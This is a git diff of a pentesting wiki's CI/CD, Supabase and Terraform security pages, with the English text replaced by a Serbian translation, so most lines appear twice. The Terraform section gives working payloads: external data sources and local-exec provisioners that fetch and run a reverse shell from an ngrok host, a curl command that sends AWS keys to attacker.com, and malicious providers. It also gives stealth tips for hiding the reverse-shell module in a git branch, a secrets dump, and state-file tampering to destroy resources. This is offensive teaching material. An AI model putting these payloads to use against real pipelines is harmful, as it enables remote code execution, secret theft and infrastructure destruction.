- **D-PPE**: **Direktni PPE** napad se dešava kada akter **modifikuje CI konfiguraciju** datoteke koja će biti izvršena.
- **I-DDE**: **Indirektni PPE** napad se dešava kada akter **modifikuje** **datoteku** na koju se CI konfiguraciona datoteka oslanja (kao što je make datoteka ili terraform konfiguracija).
- **Javni PPE ili 3PE**: U nekim slučajevima pipelines mogu biti **pokrenuti od strane korisnika koji nemaju write pristup u repozitorijumu** (i koji možda nisu ni deo organizacije) jer mogu poslati PR.
- **3PE Injekcija komandi**: Obično, CI/CD pipelines će **postaviti promenljive okruženja** sa **informacijama o PR-u**. Ako tu vrednost može kontrolisati napadač (kao što je naslov PR-a) i koristi se na **opasnom mestu** (kao što je izvršavanje **sh komandi**), napadač može **ubaciti komande tamo**.
### Exploitation Benefits
Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
Poznavanje 3 vrste za toksičnost pipeline-a, hajde da proverimo šta napadač može dobiti nakon uspešne eksploatacije:
- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
- Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
- **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
- **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
- **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
- **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
- **Tajne**: Kao što je ranije pomenuto, pipelines zahtevaju **privilegije** za svoje poslove (preuzimanje koda, izgradnja, implementacija...) i te privilegije se obično **dodeljuju u tajnama**. Ove tajne su obično dostupne putem **env promenljivih ili datoteka unutar sistema**. Stoga će napadač uvek pokušati da eksfiltrira što više tajni.
- U zavisnosti od platforme pipeline-a, napadač **može morati da specificira tajne u konfiguraciji**. To znači da ako napadač ne može da modifikuje CI konfiguracioni pipeline (**I-PPE**, na primer), može **samo eksfiltrirati tajne koje taj pipeline ima**.
- **Računanje**: Kod se izvršava negde, u zavisnosti od toga gde se izvršava, napadač bi mogao biti u mogućnosti da se dalje preusmeri.
- **Na lokaciji**: Ako se pipelines izvršavaju na lokaciji, napadač bi mogao završiti u **internoj mreži sa pristupom više resursima**.
- **Cloud**: Napadač bi mogao pristupiti **drugim mašinama u cloudu**, ali takođe bi mogao **eksfiltrirati** IAM uloge/service accounts **tokena** iz njega da bi dobio **dalji pristup unutar clouda**.
- **Mašine platforme**: Ponekad će poslovi biti izvršeni unutar **mašina platforme pipelines**, koje obično su unutar clouda sa **nema više pristupa**.
- **Izaberi to:** Ponekad će **platforma pipelines imati konfigurisanih nekoliko mašina** i ako možete **modifikovati CI konfiguracionu datoteku**, možete **naznačiti gde želite da izvršite zlonamerni kod**. U ovoj situaciji, napadač će verovatno pokrenuti reverznu ljusku na svakoj mogućoj mašini da pokuša da je dalje eksploatiše.
- **Kompromitovanje produkcije**: Ako ste unutar pipeline-a i konačna verzija se gradi i implementira iz njega, mogli biste **kompromitovati kod koji će na kraju biti pokrenut u produkciji**.
## More relevant info
### Tools & CIS Benchmark
- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) je open-source alat za reviziju vašeg softverskog lanca snabdevanja za bezbednosnu usklađenost zasnovan na novom [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). Revizija se fokusira na ceo SDLC proces, gde može otkriti rizike od vremena koda do vremena implementacije.
### Top 10 CI/CD Security Risk
Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
Proverite ovaj zanimljiv članak o top 10 CI/CD rizicima prema Cider-u: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
### Labs
- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
- Na svakoj platformi koju možete pokrenuti lokalno naći ćete kako da je pokrenete lokalno tako da je možete konfigurisati kako želite da je testirate
- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
### Automatic Tools
- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** je alat za statičku analizu koda za infrastrukturu kao kod.
## References
- [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422)
{{#include ../banners/hacktricks-training.md}}

1018
src/pentesting-ci-cd/serverless.com-security.md
View File

File diff suppressed because it is too large Load Diff

112
src/pentesting-ci-cd/supabase-security.md
View File

@@ -4,47 +4,46 @@
## Basic Information
As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
Prema njihovoj [**landing stranici**](https://supabase.com/): Supabase je open source alternativa za Firebase. Započnite svoj projekat sa Postgres bazom podataka, autentifikacijom, instant API-ima, Edge funkcijama, Realtime pretplatama, skladištem i vektorskim ugradnjama.
### Subdomain
### Subdomen
Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
U suštini, kada se projekat kreira, korisnik će dobiti supabase.co subdomen kao: **`jnanozjdybtpqgcwhdiz.supabase.co`**
## **Database configuration**
## **Konfiguracija baze podataka**
> [!TIP]
> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/database`**
> **Ovi podaci se mogu pristupiti putem linka kao što je `https://supabase.com/dashboard/project/<project-id>/settings/database`**
This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
The password is a **password the user put** previously.
Ova **baza podataka** će biti postavljena u nekoj AWS regiji, i da bi se povezali na nju, moguće je to učiniti povezivanjem na: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (ova je kreirana u us-west-1).\
Lozinka je **lozinka koju je korisnik prethodno postavio**.
Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
Stoga, pošto je subdomen poznat i koristi se kao korisničko ime, a AWS regije su ograničene, može biti moguće pokušati da **brute force-ujete lozinku**.
This section also contains options to:
Ovaj odeljak takođe sadrži opcije za:
- Reset the database password
- Configure connection pooling
- Configure SSL: Reject plan-text connections (by default they are enabled)
- Configure Disk size
- Apply network restrictions and bans
- Resetovanje lozinke baze podataka
- Konfiguraciju povezivanja
- Konfiguraciju SSL: Odbijanje plan-text konekcija (po defaultu su omogućene)
- Konfiguraciju veličine diska
- Primenu mrežnih ograničenja i zabrana
## API Configuration
## Konfiguracija API-ja
> [!TIP]
> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/api`**
> **Ovi podaci se mogu pristupiti putem linka kao što je `https://supabase.com/dashboard/project/<project-id>/settings/api`**
The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
URL za pristup supabase API-ju u vašem projektu biće: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
### anon api keys
### anon api ključevi
It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
Takođe će generisati **anon API ključ** (`role: "anon"`), kao: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` koji će aplikacija morati da koristi da bi kontaktirala API ključ izložen u našem primeru u
It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
Moguće je pronaći API REST za kontaktiranje ovog API-ja u [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), ali najzanimljiviji endpointi bi bili:
<details>
<summary>Signup (/auth/v1/signup)</summary>
```
POST /auth/v1/signup HTTP/2
Host: id.io.net
@@ -69,13 +68,11 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
</details>
<details>
<summary>Login (/auth/v1/token?grant_type=password)</summary>
<summary>Prijava (/auth/v1/token?grant_type=password)</summary>
```
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
@@ -100,68 +97,63 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
</details>
So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
Dakle, kada otkrijete klijenta koji koristi supabase sa poddomenom koja im je dodeljena (moguće je da poddomena kompanije ima CNAME preko njihove supabase poddomene), možete pokušati da **napravite novi nalog na platformi koristeći supabase API**.
### secret / service_role api keys
### tajni / service_role api ključevi
A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
Tajni API ključ će takođe biti generisan sa **`role: "service_role"`**. Ovaj API ključ treba da bude tajan jer će moći da zaobiđe **Row Level Security**.
The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
API ključ izgleda ovako: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
### JWT Secret
### JWT Tajna
A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
**JWT Tajna** će takođe biti generisana kako bi aplikacija mogla da **kreira i potpisuje prilagođene JWT tokene**.
## Authentication
## Autentifikacija
### Signups
### Registracije
> [!TIP]
> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
> Po **defaultu** supabase će omogućiti **novim korisnicima da kreiraju naloge** na vašem projektu koristeći prethodno pomenute API krajnje tačke.
However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
Međutim, ovi novi nalozi, po defaultu, **će morati da verifikuju svoju email adresu** da bi mogli da se prijave na nalog. Moguće je omogućiti **"Dozvoli anonimne prijave"** kako bi ljudi mogli da se prijave bez verifikacije svoje email adrese. Ovo bi moglo omogućiti pristup **neočekivanim podacima** (dobijaju uloge `public` i `authenticated`).\
Ovo je veoma loša ideja jer supabase naplaćuje po aktivnom korisniku, tako da bi ljudi mogli da kreiraju korisnike i prijave se, a supabase će naplatiti za njih:
<figure><img src="../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
### Passwords & sessions
### Lozinke i sesije
It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
It's recommended to **improve the requirements as the default ones are weak**.
Moguće je odrediti minimalnu dužinu lozinke (po defaultu), zahteve (nema po defaultu) i zabraniti korišćenje provaljenih lozinki.\
Preporučuje se da se **poboljšaju zahtevi jer su defaultni slabi**.
- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
- Bot and Abuse Protection: It's possible to enable Captcha.
- Korisničke sesije: Moguće je konfigurisati kako funkcionišu korisničke sesije (timeouti, 1 sesija po korisniku...)
- Zaštita od botova i zloupotrebe: Moguće je omogućiti Captcha.
### SMTP Settings
### SMTP Podešavanja
It's possible to set an SMTP to send emails.
Moguće je postaviti SMTP za slanje emailova.
### Advanced Settings
### Napredna Podešavanja
- Set expire time to access tokens (3600 by default)
- Set to detect and revoke potentially compromised refresh tokens and timeout
- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
- Max Direct Database Connections: Max number of connections used to auth (10 by default)
- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
- Postaviti vreme isteka za pristupne tokene (3600 po defaultu)
- Postaviti da detektuje i opozove potencijalno kompromitovane osvežavajuće tokene i timeout
- MFA: Naznačiti koliko MFA faktora može biti registrovano odjednom po korisniku (10 po defaultu)
- Maksimalne direktne veze sa bazom podataka: Maksimalan broj veza korišćenih za autentifikaciju (10 po defaultu)
- Maksimalno trajanje zahteva: Maksimalno vreme dozvoljeno za trajanje Auth zahteva (10s po defaultu)
## Storage
## Skladištenje
> [!TIP]
> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
> Supabase omogućava **da se skladište fajlovi** i učine dostupnim preko URL-a (koristi S3 kante).
- Set the upload file size limit (default is 50MB)
- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
- Postaviti limit veličine fajla za upload (default je 50MB)
- S3 veza se daje sa URL-om kao: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
- Moguće je **zatražiti S3 pristupni ključ** koji se sastoji od `access key ID` (npr. `a37d96544d82ba90057e0e06131d0a7b`) i `secret access key` (npr. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
## Edge Functions
## Edge Funkcije
It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
Moguće je **čuvati tajne** u supabase-u koje će biti **dostupne putem edge funkcija** (mogu se kreirati i brisati sa web-a, ali nije moguće direktno pristupiti njihovoj vrednosti).
{{#include ../banners/hacktricks-training.md}}

290
src/pentesting-ci-cd/terraform-security.md
View File

@@ -2,307 +2,277 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
[From the docs:](https://developer.hashicorp.com/terraform/intro)
[Iz dokumenata:](https://developer.hashicorp.com/terraform/intro)
HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
HashiCorp Terraform je **alat za infrastrukturu kao kod** koji vam omogućava da definišete kako **resurse u oblaku, tako i lokalne resurse** u konfiguracionim datotekama koje su čitljive za ljude, a koje možete verzionisati, ponovo koristiti i deliti. Zatim možete koristiti dosledan radni tok za obezbeđivanje i upravljanje svim vašim resursima tokom njihovog životnog ciklusa. Terraform može upravljati niskonivom komponentama kao što su resursi za računanje, skladištenje i umrežavanje, kao i visokim komponentama kao što su DNS unosi i SaaS funkcije.
#### How does Terraform work?
#### Kako Terraform funkcioniše?
Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
Terraform kreira i upravlja resursima na platformama u oblaku i drugim uslugama putem njihovih interfejsa za programiranje aplikacija (API). Provajderi omogućavaju Terraformu da radi sa praktično bilo kojom platformom ili uslugom koja ima dostupan API.
![](<../images/image (177).png>)
HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
HashiCorp i Terraform zajednica su već napisali **više od 1700 provajdera** za upravljanje hiljadama različitih tipova resursa i usluga, a ovaj broj se i dalje povećava. Sve javno dostupne provajdere možete pronaći na [Terraform Registry](https://registry.terraform.io/), uključujući Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog i mnoge druge.
The core Terraform workflow consists of three stages:
Osnovni Terraform radni tok se sastoji od tri faze:
- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
- **Pisanje:** Definišete resurse, koji mogu biti raspoređeni preko više provajdera i usluga u oblaku. Na primer, možete kreirati konfiguraciju za implementaciju aplikacije na virtuelnim mašinama u mreži Virtuelne Privatne Oblasti (VPC) sa sigurnosnim grupama i balansirnikom opterećenja.
- **Planiranje:** Terraform kreira plan izvršenja koji opisuje infrastrukturu koju će kreirati, ažurirati ili uništiti na osnovu postojeće infrastrukture i vaše konfiguracije.
- **Primena:** Nakon odobrenja, Terraform izvršava predložene operacije u ispravnom redosledu, poštujući sve zavisnosti resursa. Na primer, ako ažurirate svojstva VPC-a i promenite broj virtuelnih mašina u tom VPC-u, Terraform će ponovo kreirati VPC pre nego što skalira virtuelne mašine.
![](<../images/image (215).png>)
### Terraform Lab
### Terraform laboratorija
Just install terraform in your computer.
Samo instalirajte terraform na vašem računaru.
Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
Ovde imate [vodič](https://learn.hashicorp.com/tutorials/terraform/install-cli) i ovde imate [najbolji način za preuzimanje terraforma](https://www.terraform.io/downloads).
## RCE in Terraform
## RCE u Terraformu
Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
Terraform **nema platformu koja izlaže web stranicu ili mrežnu uslugu** koju možemo enumerisati, stoga je jedini način da se kompromituje terraform **može dodati/izmeniti terraform konfiguracione datoteke**.
However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
Međutim, terraform je **veoma osetljiva komponenta** za kompromitovanje jer će imati **privilegovan pristup** različitim lokacijama kako bi mogao pravilno da funkcioniše.
The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
Glavni način na koji napadač može kompromitovati sistem na kojem se terraform izvršava je da **kompromituje repozitorijum koji čuva terraform konfiguracije**, jer će u nekom trenutku biti **interpretirane**.
Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
U stvari, postoje rešenja koja **automatski izvršavaju terraform plan/primenu nakon što je PR** kreiran, kao što je **Atlantis**:
{{#ref}}
atlantis-security.md
{{#endref}}
If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
Ako ste u mogućnosti da kompromitujete terraform datoteku, postoje različiti načini na koje možete izvršiti RCE kada neko izvrši `terraform plan` ili `terraform apply`.
### Terraform plan
Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
Terraform plan je **najčešće korišćena komanda** u terraformu i programeri/rešenja koja koriste terraform je pozivaju stalno, tako da je **najlakši način da dobijete RCE** da se pobrinete da otrovate terraform konfiguracionu datoteku koja će izvršiti proizvoljne komande u `terraform plan`.
**Using an external provider**
**Korišćenje spoljnog provajdera**
Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
Terraform nudi [`external` provajder](https://registry.terraform.io/providers/hashicorp/external/latest/docs) koji pruža način za interakciju između Terraforma i spoljnjih programa. Možete koristiti `external` izvor podataka za izvršavanje proizvoljnog koda tokom `plana`.
Umetanje u terraform konfiguracionu datoteku nešto poput sledećeg će izvršiti rev shell prilikom izvršavanja `terraform plan`:
```javascript
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
**Korišćenje prilagođenog provajdera**
**Using a custom provider**
An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
Napadač bi mogao poslati [prilagođenog provajdera](https://learn.hashicorp.com/tutorials/terraform/provider-setup) na [Terraform Registry](https://registry.terraform.io/) i zatim ga dodati u Terraform kod u funkcionalnoj grani ([primer odavde](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
provider "evil" {}
```
Provajder se preuzima u `init` i izvršiće maliciozni kod kada se izvrši `plan`
The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
Možete pronaći primer na [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
**Korišćenje spoljnog reference**
**Using an external reference**
Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
Obe pomenute opcije su korisne, ali nisu baš diskretne (druga je diskretnija, ali složenija od prve). Ovaj napad možete izvesti čak i na **diskretniji način**, prateći ove sugestije:
- Umesto da direktno dodate rev shell u terraform datoteku, možete **učitati spoljnji resurs** koji sadrži rev shell:
```javascript
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
Možete pronaći rev shell kod na [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
- U spoljnim resursima, koristite **ref** funkciju da sakrijete **terraform rev shell kod u grani** unutar repozitorijuma, nešto poput: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
### Terraform Apply
Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
You just need to make sure some payload like the following ones ends in the `main.tf` file:
Terraform apply će biti izvršen da primeni sve promene, takođe ga možete zloupotrebiti da dobijete RCE injektovanjem **malicioznog Terraform fajla sa** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
Samo treba da se uverite da neki payload poput sledećih završi u `main.tf` fajlu:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}
```
Sledite **preporukama iz prethodne tehnike** da izvršite ovaj napad na **diskretniji način koristeći spoljne reference**.
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
## Secrets Dumps
You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
## Izvori tajni
Možete imati **tajne vrednosti koje koristi terraform izbačene** pokretanjem `terraform apply` dodavanjem nečega poput:
```json
output "dotoken" {
value = nonsensitive(var.do_token)
value = nonsensitive(var.do_token)
}
```
## Zloupotreba Terraform State Fajlova
## Abusing Terraform State Files
U slučaju da imate pristup za pisanje nad terraform state fajlovima, ali ne možete da menjate terraform kod, [**ova istraživanja**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) nude neke zanimljive opcije za korišćenje fajla:
In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
### Brisanje resursa <a href="#deleting-resources" id="deleting-resources"></a>
### Deleting resources <a href="#deleting-resources" id="deleting-resources"></a>
Postoje 2 načina da uništite resurse:
There are 2 ways to destroy resources:
1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
1. **Umetnite resurs sa nasumičnim imenom u state fajl koji pokazuje na pravi resurs koji treba uništiti**
Pošto će terraform videti da resurs ne bi trebao da postoji, uništiće ga (prateći pravi ID resursa koji je naznačen). Primer sa prethodne strane:
```json
{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},
```
2. **Izmenite resurs za brisanje na način da nije moguće ažurirati (tako da će biti obrisan i ponovo kreiran)**
2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
Za EC2 instancu, izmena tipa instance je dovoljna da terraform obriše i ponovo je kreira.
### RCE
It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
Takođe je moguće [napraviti prilagođeni provajder](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) i jednostavno zameniti jednog od provajdera u terraform state datoteci za zlonamerni ili dodati prazan resurs sa zlonamernim provajderom. Primer iz originalnog istraživanja:
```json
"resources": [
{
"mode": "managed",
"type": "scaffolding_example",
"name": "example",
"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
"instances": [
"mode": "managed",
"type": "scaffolding_example",
"name": "example",
"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
"instances": [
]
]
},
```
### Zamena crne liste provajdera
### Replace blacklisted provider
In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
